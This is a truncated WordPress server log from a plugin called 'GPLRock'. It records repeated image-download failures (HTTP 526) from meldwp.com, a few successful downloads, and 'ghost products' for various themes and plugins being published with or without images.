product yolox-business-startup-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:17:40 UTC] GPLRock: Image download failed for product yolox-business-startup-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:17:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yolox--business--startup-blog-wordpress-theme-32387.webp for product yolox-business-startup-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:17:43 UTC] GPLRock: Image download failed for product yolox-business-startup-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:17:45 UTC] GPLRock: Image download failed for product yolox-business-startup-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:17:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/yolox--business--startup-blog-wordpress-theme-32387.webp for product yolox-business-startup-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:17:47 UTC] GPLRock WARNING: Image download failed for product yolox-business-startup-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/yolox--business--startup-blog-wordpress-theme-32387.webp [06-Apr-2026 07:17:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: yolox-business-startup-blog-wordpress-theme [06-Apr-2026 07:17:47 UTC] GPLRock: Image download failed for product cobalt-responsive-architect-creatives-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:17:49 UTC] GPLRock: Image download failed for product cobalt-responsive-architect-creatives-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:17:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cobalt---responsive-architect--creatives-wp-theme-5872.webp for product cobalt-responsive-architect-creatives-wp-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:17:51 UTC] GPLRock: Image download failed for product cobalt-responsive-architect-creatives-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:17:53 UTC] GPLRock: Image download failed for product cobalt-responsive-architect-creatives-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:17:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cobalt---responsive-architect--creatives-wp-theme-5872.webp for product cobalt-responsive-architect-creatives-wp-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:17:56 UTC] GPLRock WARNING: Image download failed for product cobalt-responsive-architect-creatives-wp-theme. URL: https://meldwp.com/wp-content/uploads/cobalt---responsive-architect--creatives-wp-theme-5872.webp [06-Apr-2026 07:17:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cobalt-responsive-architect-creatives-wp-theme [06-Apr-2026 07:17:56 UTC] GPLRock: Image downloaded successfully for product densmi-dental-clinic-dentist-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c8d017ae.webp [06-Apr-2026 07:17:56 UTC] GPLRock: Using pre-downloaded image for product densmi-dental-clinic-dentist-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c8d017ae.webp [06-Apr-2026 07:17:56 UTC] GPLRock: Ghost product published with image - Product ID: densmi-dental-clinic-dentist-wordpress-theme [06-Apr-2026 07:17:56 UTC] GPLRock: Image download failed for product gadden-garden-landscaper-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:17:58 UTC] GPLRock: Image download failed for product gadden-garden-landscaper-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:18:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gadden---garden-landscaper-wordpress-theme-9679.webp for product gadden-garden-landscaper-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:18:00 UTC] GPLRock: Image download failed for product gadden-garden-landscaper-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:18:02 UTC] GPLRock: Image download failed for product gadden-garden-landscaper-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:18:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gadden---garden-landscaper-wordpress-theme-9679.webp for product gadden-garden-landscaper-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:18:04 UTC] GPLRock WARNING: Image download failed for product gadden-garden-landscaper-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gadden---garden-landscaper-wordpress-theme-9679.webp [06-Apr-2026 07:18:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gadden-garden-landscaper-wordpress-theme [06-Apr-2026 07:18:04 UTC] GPLRock: Image download failed for product unded-creative-agency-and-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:18:07 UTC] GPLRock: Image download failed for product unded-creative-agency-and-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:18:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/unded---creative-agency-and-portfolio-wordpress-theme-2722.webp for product unded-creative-agency-and-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:18:09 UTC] GPLRock: Image download failed for product unded-creative-agency-and-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:18:11 UTC] GPLRock: Image download failed for product unded-creative-agency-and-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:18:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/unded---creative-agency-and-portfolio-wordpress-theme-2722.webp for product unded-creative-agency-and-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:18:13 UTC] GPLRock WARNING: Image download failed for product unded-creative-agency-and-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/unded---creative-agency-and-portfolio-wordpress-theme-2722.webp [06-Apr-2026 07:18:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: unded-creative-agency-and-portfolio-wordpress-theme [06-Apr-2026 07:18:13 UTC] GPLRock: Image downloaded successfully for product panola-resort-and-hotel-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-68b4bc4a.webp [06-Apr-2026 07:18:13 UTC] GPLRock: Using pre-downloaded image for product panola-resort-and-hotel-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-68b4bc4a.webp [06-Apr-2026 07:18:13 UTC] GPLRock: Ghost product published with image - Product ID: panola-resort-and-hotel-wordpress-theme [06-Apr-2026 07:18:13 UTC] GPLRock: Image download failed for product carry-hill-school-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:18:15 UTC] GPLRock: Image download failed for product carry-hill-school-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:18:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/carry-hill-school---education-wordpress-theme-5874.webp for product carry-hill-school-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:18:18 UTC] GPLRock: Image download failed for product carry-hill-school-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:18:20 UTC] GPLRock: Image download failed for product carry-hill-school-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:18:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/carry-hill-school---education-wordpress-theme-5874.webp for product carry-hill-school-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:18:22 UTC] GPLRock WARNING: Image download failed for product carry-hill-school-education-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/carry-hill-school---education-wordpress-theme-5874.webp [06-Apr-2026 07:18:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: carry-hill-school-education-wordpress-theme [06-Apr-2026 07:18:22 UTC] GPLRock: Image download failed for product medunit-psychology-health-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:18:24 UTC] GPLRock: Image download failed for product medunit-psychology-health-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:18:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medunit--psychology--health-care-wordpress-theme-33395.webp for product medunit-psychology-health-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:18:26 UTC] GPLRock: Image download failed for product medunit-psychology-health-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:18:28 UTC] GPLRock: Image download failed for product medunit-psychology-health-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:18:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medunit--psychology--health-care-wordpress-theme-33395.webp for product medunit-psychology-health-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:18:30 UTC] GPLRock WARNING: Image download failed for product medunit-psychology-health-care-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/medunit--psychology--health-care-wordpress-theme-33395.webp [06-Apr-2026 07:18:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: medunit-psychology-health-care-wordpress-theme [06-Apr-2026 07:18:31 UTC] GPLRock: Image download failed for product cubez-creative-wordpress-showcase-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:18:33 UTC] GPLRock: Image download failed for product cubez-creative-wordpress-showcase-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:18:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cubez---creative-wordpress-showcase-portfolio-theme-22679.webp for product cubez-creative-wordpress-showcase-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:18:35 UTC] GPLRock: Image download failed for product cubez-creative-wordpress-showcase-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:18:37 UTC] GPLRock: Image download failed for product cubez-creative-wordpress-showcase-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:18:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cubez---creative-wordpress-showcase-portfolio-theme-22679.webp for product cubez-creative-wordpress-showcase-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:18:39 UTC] GPLRock WARNING: Image download failed for product cubez-creative-wordpress-showcase-portfolio-theme. URL: https://meldwp.com/wp-content/uploads/cubez---creative-wordpress-showcase-portfolio-theme-22679.webp [06-Apr-2026 07:18:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cubez-creative-wordpress-showcase-portfolio-theme [06-Apr-2026 07:25:21 UTC] GPLRock: Image downloaded successfully for product gloreya-food-ordering-delivery-restaurant-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f575ffbe.webp [06-Apr-2026 07:25:21 UTC] GPLRock: Using pre-downloaded image for product gloreya-food-ordering-delivery-restaurant-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f575ffbe.webp [06-Apr-2026 07:25:21 UTC] GPLRock: Ghost product published with image - Product ID: gloreya-food-ordering-delivery-restaurant-wordpress-theme [06-Apr-2026 07:25:22 UTC] GPLRock: Image download failed for product finance-hawk-consulting-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:25:24 UTC] GPLRock: Image download failed for product finance-hawk-consulting-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:25:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/finance-hawk---consulting-business-wordpress-theme-4136.webp for product finance-hawk-consulting-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:25:26 UTC] GPLRock: Image download failed for product finance-hawk-consulting-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:25:28 UTC] GPLRock: Image download failed for product finance-hawk-consulting-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:25:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/finance-hawk---consulting-business-wordpress-theme-4136.webp for product finance-hawk-consulting-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:25:30 UTC] GPLRock WARNING: Image download failed for product finance-hawk-consulting-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/finance-hawk---consulting-business-wordpress-theme-4136.webp [06-Apr-2026 07:25:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: finance-hawk-consulting-business-wordpress-theme [06-Apr-2026 07:25:31 UTC] GPLRock: Image download failed for product royal-marketing-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:25:33 UTC] GPLRock: Image download failed for product royal-marketing-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:25:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/royal---marketing-landing-wordpress-theme-22549.webp for product royal-marketing-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:25:35 UTC] GPLRock: Image download failed for product royal-marketing-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:25:37 UTC] GPLRock: Image download failed for product royal-marketing-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:25:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/royal---marketing-landing-wordpress-theme-22549.webp for product royal-marketing-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:25:39 UTC] GPLRock WARNING: Image download failed for product royal-marketing-landing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/royal---marketing-landing-wordpress-theme-22549.webp [06-Apr-2026 07:25:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: royal-marketing-landing-wordpress-theme [06-Apr-2026 07:25:39 UTC] GPLRock: Image download failed for product logistify-transportation-logistics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:25:42 UTC] GPLRock: Image download failed for product logistify-transportation-logistics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:25:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/logistify---transportation--logistics-wordpress-theme-20867.webp for product logistify-transportation-logistics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:25:44 UTC] GPLRock: Image download failed for product logistify-transportation-logistics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:25:46 UTC] GPLRock: Image download failed for product logistify-transportation-logistics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:25:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/logistify---transportation--logistics-wordpress-theme-20867.webp for product logistify-transportation-logistics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:25:48 UTC] GPLRock WARNING: Image download failed for product logistify-transportation-logistics-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/logistify---transportation--logistics-wordpress-theme-20867.webp [06-Apr-2026 07:25:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: logistify-transportation-logistics-wordpress-theme [06-Apr-2026 07:25:48 UTC] GPLRock: Image download failed for product soulmedic-hospital-doctor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:25:50 UTC] GPLRock: Image download failed for product soulmedic-hospital-doctor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:25:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/soulmedic--hospital--doctor-wordpress-theme-2772.webp for product soulmedic-hospital-doctor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:25:52 UTC] GPLRock: Image download failed for product soulmedic-hospital-doctor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:25:54 UTC] GPLRock: Image download failed for product soulmedic-hospital-doctor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:25:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/soulmedic--hospital--doctor-wordpress-theme-2772.webp for product soulmedic-hospital-doctor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:25:57 UTC] GPLRock WARNING: Image download failed for product soulmedic-hospital-doctor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/soulmedic--hospital--doctor-wordpress-theme-2772.webp [06-Apr-2026 07:25:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: soulmedic-hospital-doctor-wordpress-theme [06-Apr-2026 07:25:57 UTC] GPLRock: Image download failed for product vocal-singing-voice-artist-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:25:59 UTC] GPLRock: Image download failed for product vocal-singing-voice-artist-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:26:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vocal---singing--voice-artist-wordpress-theme-19697.webp for product vocal-singing-voice-artist-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:26:01 UTC] GPLRock: Image download failed for product vocal-singing-voice-artist-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:26:03 UTC] GPLRock: Image download failed for product vocal-singing-voice-artist-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:26:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vocal---singing--voice-artist-wordpress-theme-19697.webp for product vocal-singing-voice-artist-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:26:05 UTC] GPLRock WARNING: Image download failed for product vocal-singing-voice-artist-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vocal---singing--voice-artist-wordpress-theme-19697.webp [06-Apr-2026 07:26:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vocal-singing-voice-artist-wordpress-theme [06-Apr-2026 07:26:05 UTC] GPLRock: Image download failed for product escoot-single-product-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:26:07 UTC] GPLRock: Image download failed for product escoot-single-product-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:26:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/escoot---single-product-wordpress-24187.webp for product escoot-single-product-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:26:10 UTC] GPLRock: Image download failed for product escoot-single-product-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:26:12 UTC] GPLRock: Image download failed for product escoot-single-product-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:26:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/escoot---single-product-wordpress-24187.webp for product escoot-single-product-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:26:14 UTC] GPLRock WARNING: Image download failed for product escoot-single-product-wordpress. URL: https://meldwp.com/wp-content/uploads/escoot---single-product-wordpress-24187.webp [06-Apr-2026 07:26:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: escoot-single-product-wordpress [06-Apr-2026 07:26:14 UTC] GPLRock: Image download failed for product miex-creative-agency-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:26:16 UTC] GPLRock: Image download failed for product miex-creative-agency-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:26:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/miex---creative-agency-wordpress-28864.webp for product miex-creative-agency-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:26:18 UTC] GPLRock: Image download failed for product miex-creative-agency-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:26:20 UTC] GPLRock: Image download failed for product miex-creative-agency-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:26:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/miex---creative-agency-wordpress-28864.webp for product miex-creative-agency-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:26:22 UTC] GPLRock WARNING: Image download failed for product miex-creative-agency-wordpress. URL: https://meldwp.com/wp-content/uploads/miex---creative-agency-wordpress-28864.webp [06-Apr-2026 07:26:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: miex-creative-agency-wordpress [06-Apr-2026 07:26:23 UTC] GPLRock: Image download failed for product star-deal-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:26:25 UTC] GPLRock: Image download failed for product star-deal-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:26:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/star-deal---multipurpose-woocommerce-theme-25572.webp for product star-deal-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:26:27 UTC] GPLRock: Image download failed for product star-deal-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:26:29 UTC] GPLRock: Image download failed for product star-deal-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:26:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/star-deal---multipurpose-woocommerce-theme-25572.webp for product star-deal-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:26:31 UTC] GPLRock WARNING: Image download failed for product star-deal-multipurpose-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/star-deal---multipurpose-woocommerce-theme-25572.webp [06-Apr-2026 07:26:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: star-deal-multipurpose-woocommerce-theme [06-Apr-2026 07:26:31 UTC] GPLRock: Image download failed for product entox-rental-marketplace-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:26:33 UTC] GPLRock: Image download failed for product entox-rental-marketplace-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:26:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/entox---rental-marketplace-wordpress-theme-24005.webp for product entox-rental-marketplace-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:26:36 UTC] GPLRock: Image download failed for product entox-rental-marketplace-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:26:38 UTC] GPLRock: Image download failed for product entox-rental-marketplace-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:26:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/entox---rental-marketplace-wordpress-theme-24005.webp for product entox-rental-marketplace-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:26:40 UTC] GPLRock WARNING: Image download failed for product entox-rental-marketplace-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/entox---rental-marketplace-wordpress-theme-24005.webp [06-Apr-2026 07:26:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: entox-rental-marketplace-wordpress-theme [06-Apr-2026 07:27:05 UTC] GPLRock: Image downloaded successfully for product luxetta-luxury-hotel-resort-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-359772ef.jpg [06-Apr-2026 07:27:05 UTC] GPLRock: Using pre-downloaded image for product luxetta-luxury-hotel-resort-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-359772ef.jpg [06-Apr-2026 07:27:05 UTC] GPLRock: Ghost product published with image - Product ID: luxetta-luxury-hotel-resort-elementor-template-kit [06-Apr-2026 07:27:12 UTC] GPLRock: Image downloaded successfully for product hanga-construction-building-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-df592304.webp [06-Apr-2026 07:27:12 UTC] GPLRock: Using pre-downloaded image for product hanga-construction-building-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-df592304.webp [06-Apr-2026 07:27:12 UTC] GPLRock: Ghost product published with image - Product ID: hanga-construction-building-elementor-template-kit [06-Apr-2026 07:27:14 UTC] GPLRock: Image downloaded successfully for product lunax-digital-marketing-agency-seo-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2792f115.avif [06-Apr-2026 07:27:14 UTC] GPLRock: Using pre-downloaded image for product lunax-digital-marketing-agency-seo-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2792f115.avif [06-Apr-2026 07:27:14 UTC] GPLRock: Ghost product published with image - Product ID: lunax-digital-marketing-agency-seo-wordpress-theme [06-Apr-2026 07:27:15 UTC] GPLRock: Image downloaded successfully for product booknetic-google-calendar-2-way-sync-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e7143982.webp [06-Apr-2026 07:27:15 UTC] GPLRock: Using pre-downloaded image for product booknetic-google-calendar-2-way-sync-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e7143982.webp [06-Apr-2026 07:27:15 UTC] GPLRock: Ghost product published with image - Product ID: booknetic-google-calendar-2-way-sync-addon [06-Apr-2026 07:27:19 UTC] GPLRock: Image downloaded successfully for product booknetic-custom-durations-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84cebd87.svg [06-Apr-2026 07:27:19 UTC] GPLRock: Using pre-downloaded image for product booknetic-custom-durations-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84cebd87.svg [06-Apr-2026 07:27:19 UTC] GPLRock: Ghost product published with image - Product ID: booknetic-custom-durations-addon [06-Apr-2026 07:27:20 UTC] GPLRock: Image downloaded successfully for product bit-integrations-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a1332946.gif [06-Apr-2026 07:27:20 UTC] GPLRock: Using pre-downloaded image for product bit-integrations-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a1332946.gif [06-Apr-2026 07:27:20 UTC] GPLRock: Ghost product published with image - Product ID: bit-integrations-plugin [06-Apr-2026 07:27:22 UTC] GPLRock: Image downloaded successfully for product spectra-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-96de1ebf.webp [06-Apr-2026 07:27:22 UTC] GPLRock: Using pre-downloaded image for product spectra-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-96de1ebf.webp [06-Apr-2026 07:27:22 UTC] GPLRock: Ghost product published with image - Product ID: spectra-pro [06-Apr-2026 07:27:23 UTC] GPLRock: Image downloaded successfully for product motto-creative-agency-startup-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-84fbc232.jpg [06-Apr-2026 07:27:24 UTC] GPLRock: Using pre-downloaded image for product motto-creative-agency-startup-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-84fbc232.jpg [06-Apr-2026 07:27:24 UTC] GPLRock: Ghost product published with image - Product ID: motto-creative-agency-startup-wordpress-theme [06-Apr-2026 07:27:25 UTC] GPLRock: Image downloaded successfully for product wilcity-directory-listing-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-833ac2dc.jpg [06-Apr-2026 07:27:25 UTC] GPLRock: Using pre-downloaded image for product wilcity-directory-listing-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-833ac2dc.jpg [06-Apr-2026 